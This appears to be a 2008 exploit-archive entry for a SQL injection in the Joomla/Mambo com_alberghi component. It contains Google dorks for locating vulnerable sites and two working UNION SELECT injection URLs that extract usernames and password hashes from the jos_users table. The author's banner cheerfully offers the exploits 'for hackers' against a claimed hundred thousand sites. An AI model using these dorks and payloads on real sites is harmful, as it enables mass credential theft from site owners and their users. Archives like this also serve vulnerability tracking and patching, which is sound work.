Topic : | Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability
|
ExploitAlert : 3575
Credit : S@BUN
Date : 19.03.2008
Download
Plain text version
 Exploit Code : ##########################################
#
# Mambo Component com_alberghi SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY
100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR
you can see all my exploits
http://my.opera.com/SQL-Injection/blog/
###########################################
#
# DORK 1 : allinurl: "com_alberghi" detail
#
# DORK 2 : allinurl: "com_alberghi"
#
###########################################
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/*
*/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,
2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**
/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/*
*/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,
2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/
**/from/**/jos_users/*
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
side note:
<name>Alberghi</name>
<author>Vamba</author>
<creationDate>14-04-2007</creationDate>
<copyright>This component is released under the GNU/GPL
License</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>webmaster@joomlaitalia.com</authorEmail>
<authorUrl>www.joomlaitalia.com</authorUrl>
<version>2.1.3</version>
<description>Alberghi a fork of Accombo project original Author Niall
McCullagh</description>
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|